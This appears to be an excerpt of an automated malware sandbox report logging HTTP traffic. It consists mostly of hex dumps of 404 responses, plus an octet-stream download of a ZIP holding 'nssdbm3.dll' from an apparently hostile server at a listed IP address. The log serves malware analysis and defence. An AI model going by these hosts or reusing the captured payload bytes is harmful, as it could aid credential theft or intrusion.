ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 2a 64 b1 1d 32 12 51 8c 26 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e f6 11 11 ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 cc 62 06 f1 60 7f ae 03 58 e5 1d e4 a4 7d 10 99 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 
7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 80 8a 49 37 03 80 e3 1c cd 20 f5 52 b7 3b 3a 96 f5 cb e7 17 3f dc e5 7e 0d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 98 3a 1d f8 4e b5 14 86 c1 70 a8 fe 04 c5 db ad 0e c9 9c 47 a2 91 29 98 f9 4c 79 de 79 d5 57 d0 6f fd ef 76 67 a8 db e9 d5 6a e2 3c 99 a8 84 be 57 a7 eb 6c 28 8e 94 16 a3 4e d4 e7 23 b2 52 dc 1a 9e 8b 18 07 64 01 7d 46 02 82 96 c6 ce 2d b2 9d df 3c 42 56 60 de 9e 93 0f 94 45 a9 24 4f 78 60 22 30 5f d6 a0 b8 78 fe b1 8e 98 37 20 5e 32 d0 c9 f3 32 42 82 39 16 12 47 0b f9 17 30 8d e3 51 22 b2 3d df 10 54 5a 17 1c 5c 5a 12 b3 19 5f 11 8f 69 f9 e4 b9 2a 01 6e f3 fd 58 b3 dc 95 25 1f 90 13 f7 5e 15 23 b5 01 92 e3 92 c2 01 7d 7e d3 95 bc 43 cf 76 62 93 55 e1 05 85 d4 9c 97 2e 60 10 3a 93 83 ac e5 fe 99 ae 32 c8 6e 95 8d 4a d5 f8 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 fb 37 67 d2 1f ad af a2 e2 54 24 d0 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:13 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=96Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:13 GMTServer: Apache/2.4.29 (Ubuntu)Keep-Alive: timeout=5, max=95Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Data Raw: 37 63 63 30 32 0d 0a 00 00 6e 47 17 86 3c 28 c2 36 40 7b b6 16 56 36 0c 45 49 50 b5 c5 ea fa 80 5d 3d 4d 94 01 9f 38 c5 e4 b8 b3 1b e4 69 14 ba 72 71 2e a2 b2 43 37 3a 71 f6 aa 4d af 80 0d c2 d6 60 e5 83 44 7d 49 98 ab 99 7a d3 1e 48 2e 96 0c 59 41 c8 0f 06 51 ea 33 08 e5 01 db b9 93 51 3b a1 fd f4 43 7f 32 3d 09 67 19 00 03 ae df 8e 36 20 d7 fa a7 5c ea c3 c5 0c 90 75 ff 67 5a b4 7c e9 9f 09 79 61 ab 85 ce 60 d5 d3 ef 53 47 4d c5 7c a2 52 90 b7 be 4f 41 dd 46 29 0a f9 36 87 18 bc 67 b1 2e 7c f9 3e 05 14 73 5e ef 3b f3 56 72 70 6e 1e 04 b2 50 2a 87 d6 37 83 3a fa 04 b1 07 a0 e2 19 17 80 2f ba 8e 42 0d 0a 7e 82 cf 27 11 da 9d 1d b3 9c 88 8a 38 22 7a 61 2e e6 2a 7e d7 46 ad 96 2e cb 81 88 4b 55 09 d4 c1 1e 2b 50 6b bd 8e c3 58 87 c6 41 c9 b0 26 1c 94 c0 99 7d 5a 99 2b 99 5b af 18 9f 7a bd 0c 93 a6 69 3e 1a 20 8c 63 bb ca c9 ba ad f5 31 61 a4 cf 37 1f 1a eb 3f 82 c2 74 e1 81 8f f5 03 96 07 cd 96 df a5 61 6c fd 71 12 70 df ce 22 db 30 d5 a9 b6 2a 08 8f 01 e9 46 76 22 e1 ff b8 5c 3f 1f 83 d0 30 38 ba 60 bd 49 22 09 69 53 40 98 e3 94 54 e0 2f 60 43 8c 67 f0 86 f0 fb 34 6c 1b 45 6e d5 f6 4e 76 8c 9e cd 37 14 39 7e a2 55 6b 5f c7 ae 4a 88 54 d9 60 49 d3 03 e7 fe 88 2c c7 1f fd 10 e5 ec 9a db 25 79 41 75 04 c5 e3 a1 b7 d9 17 81 5d 26 db 3a 35 9d f7 d5 49 4f 44 e8 d0 32 79 2e 0a ba e8 33 5c b0 05 89 52 1e 05 63 bb 9a d4 46 d1 a0 3c df d5 bf 2b 02 87 d2 db 53 3d a0 c3 96 cb 7d 64 57 b4 85 5b ae 39 16 1b e2 99 15 f7 bb 2e 44 3d e2 08 5a 11 dc 40 9e 02 91 b1 41 6b 05 23 9f f5 4a b0 6e 78 0d 2a f7 d8 d2 12 74 3c 8b 08 f5 a5 36 3d 07 4e c4 b2 d6 ea ec 0f f8 14 a3 0b ab c1 39 e2 a7 66 94 c6 a6 d3 30 18 65 17 b2 f4 a7 c1 58 40 f6 e7 2a 9d 72 08 ac 54 7b 52 ff eb 48 5a 75 56 4f 82 56 c3 e9 37 7f a3 29 ff f1 ee 21 bd b4 4f 07 bb 
75 4b 99 01 ac 67 90 ff 21 62 11 14 74 22 d5 a5 d5 93 03 e8 a9 51 04 f8 fc b7 2c f4 47 1b 3f 4d 93 e6 9f 70 06 c5 52 89 52 8c 3e 09 6e be ca 39 52 41 cc 35 5f 27 89 98 4c 68 48 94 56 10 02 37 e2 be 43 f0 8b 9a 47 8a 76 1e 5e 84 8e 8e 8b 0d 16 21 95 87 04 73 2d c7 4c 02 f6 30 60 f4 6b 3d 82 ae 74 99 df 92 5a 4d aa 78 71 b0 7b 66 f4 eb 40 3a aa db da 2b 5c cb e1 59 fb c4 57 cc 6f e6 65 be a9 0b 89 8b 87 2b 02 02 53 d6 5a e3 95 e6 d8 99 0a e2 4c 97 6f 09 c5 e9 fd c7 23 56 3e ec ab 1c 2b 48 06 30 c8 0b 4c c7 c7 5f c6 c9 6b ad 20 23 6b de a1 9f 3f b0 fc f8 06 04 cd 51 e5 30 d5 71 ef d6 a3 96 1c 41 be c0 52 50 1f fb 55 d2 7a b6 d5 5b d4 72 ed f6 4b a5 53 52 d2 c1 d4 d1 79 5e 67 ad 6d 11 30 c0 db 31 a2 29 77 31 ac b2 03 04 1e 57 f3 28 bc cb 58 67 5b 5b 67 c2 3f c3 78 d9 e8 1f ba e2 50 11 3b fc 5f e0 3c c7 4b d4 50 b0 20 e1 1e 3c d7 d3 2e e3 9c d8 f7 0d 82 23 af 40 16 06 1f 84 4c 7f 4f 6d 5b df 92 a0 c7 0b 80 51 a9 cd 6d e1 0c 1c 9d 89 05 4d 99 20 83 58 13 87 89 b0 6e 2c 9c c3 75 44 f4 8b 85 52 2a a2 e4 2f a9 e7 5b 9a 1e bc 79
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:13 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 ed 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 26 0b 04 59 b9 1d 6d f5 e9 e6 a1 29 7a 3a 62 c3 cc a7 43 ec 44 d7 6b 50 78 18 e0 30 8a 3c a2 61 a3 d6 d4 22 a2 58 d5 5b 2d 22 ad 88 88 5e 6f d7 9f b7 ee bc db 32 b9 9a 4c ca 4c 08 03 d4 d2 a1 97 c6 37 13 4b 42 c4 d4 5a c6 ca 23 e8 16 41 bf 6c 13 d9 c8 9f 57 db 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 aa 8e 1f 9e 51 08 56 2b 88 b6 4b 24 7e 45 f7 ff 78 8d 55 db 24 0d 11 12 b4 1f eb 92 24 82 45 c5 03 49 bd a3 61 7e de f5 69 33 11 17 7e 4f af 9a a5 e4 c3 a0 c1 b9 9d 7a 0d 80 4e 19 e0 2e 95 a9 1d 1a f4 96 be 25 51 61 9f d4 3f 7c 88 28 c8 48 6b 11 41 48 9a 07 fd ec 23 20 77 ac 85 2f bd e0 0d c0 4d bf 46 24 fd f8 12 6c 23 6c 29 6c 0a 8d c7 fd e4 0e b4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 d5 20 c6 4f 6b 79 82 ae 9c a7 82 4e 95 1f ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df 75 6c e5 ee 30 4c 80 f0 00 f9 13 7f 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 9a 70 f7 9d 3f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 94 42 40 bb 9a c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 31 2a c4 e8 3a a1 54 55 39 07 bd 1b 6f d3 cb 29 32 a2 ed 5b 1e 50 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 4d 67 85 4d 5e ae 03 13 61 6a e6 a6 dd 1a 9f 10 af d9 b0 99 89 93 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fa b0 92 48 a9 b4 bb e1 
33 17 28 d2 9e c6 1d d0 eb aa 7a 8f 52 61 e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 08 c4 3a d6 63 b9 82 7b 50 bf e5 7e 75 82 71 d4 03 6b 2c 9a 76 48 0e ca 82 21 2f 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 01 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:14 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=94Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 13:31:18 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 402Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 33 2e 35 36 2e 31 34 36 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 193.56.146.214 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 327Connection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 13:31:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/5.6.40Data Raw: 31 66 34 32 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 b1 ba 89 c7 a8 25 9f ae 04 75 64 62 d8 e6 b8 a1 54 5e 1b 80 2b d8 55 a8 c7 ea 87 23 6d 16 be 61 f6 31 6d 17 41 3e da 16 a3 c9 32 6e a0 14 dc ac 2f 7b b0 2d 61 47 b0 7a 0d de 75 8f f9 9f 56 11 36 05 4a f4 e2 d7 c0 07 43 c8 48 09 d2 74 94 82 bf 6c 13 d9 39 03 d5 18 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cf 00 8e ff 0e 43 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 85 f6 ff 78 f3 56 db c4 0d 13 13 e3 0f e0 92 24 18 4f c5 03 71 ca a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a f0 96 be 21 51 61 9a d4 3e 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 a2 7a 31 6c 1a 7c 0a 8d 1b f9 e6 0e 10 eb 7e 71 eb 90 f0 1a 10 de 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 a6 0f 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 33 cd 46 99 48 15 ac af eb d9 55 3d af ba 68 92 de fe 9d 57 7c 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b a8 d4 de 8e 82 11 e8 e4 1f 9e a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 af 5b 85 1f d4 8c 69 91 9c 61 06 f1 2c 9a af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 e4 56 89 8b e1 42 78 d7 9c 9e c3 e0 2b a5 b6 bb 01 
7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a2 aa 45 63 80 e3 1c b1 65 f5 52 48 d4 3f 96 4d 8d e7 17 3f fe e7 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 13:31:14 GMTContent-Type: application/octet-streamContent-Length: 2828315Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-2b281b"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 9a 7a 6e 4e 3c 09 f8 7b 72 d2 00 00 d0 69 01 00 0b 00 00 00 6e 73 73 64 62 6d 33 2e 64 6c 6c ec fd 7f 7c 14 d5 d5 38 00 cf ee 4e 92 0d 59 d8 05 36 18 24 4a 90 a0 d1 a0 06 16 24 31 80 d9 84 dd 44 20 b0 61 c9 2e 11 13 b4 6a 4c b7 56 f9 b1 43 b0 12 08 4e 02 3b 19 b7 f5 e9 a3 7d ec 2f ab f5 f1 e9 0f db a7 b6 b5 80 d5 ea 86 d8 24 f8 13 81 5a 2c 54 a3 52 bd 71 63 8d 92 86 45 63 e6 3d e7 dc 99 dd 0d da ef f7 fb be 7f bf f0 c9 ec cc dc 3b f7 9e 7b ee b9 e7 9e 73 ee b9 e7 d6 de 70 bf 60 11 04 41 84 3f 4d 13 84 83 02 ff 57 21 fc df ff e5 99 04 61 ca ec 3f 4e 11 9e ca 7e 65 ce 41 d3 ea 57 e6 ac 6f f9 fa b6 82 cd 5b ef ba 7d eb cd df 2c b8 e5 e6 3b ef bc 2b 5c f0 b5 db 0a b6 4a 77 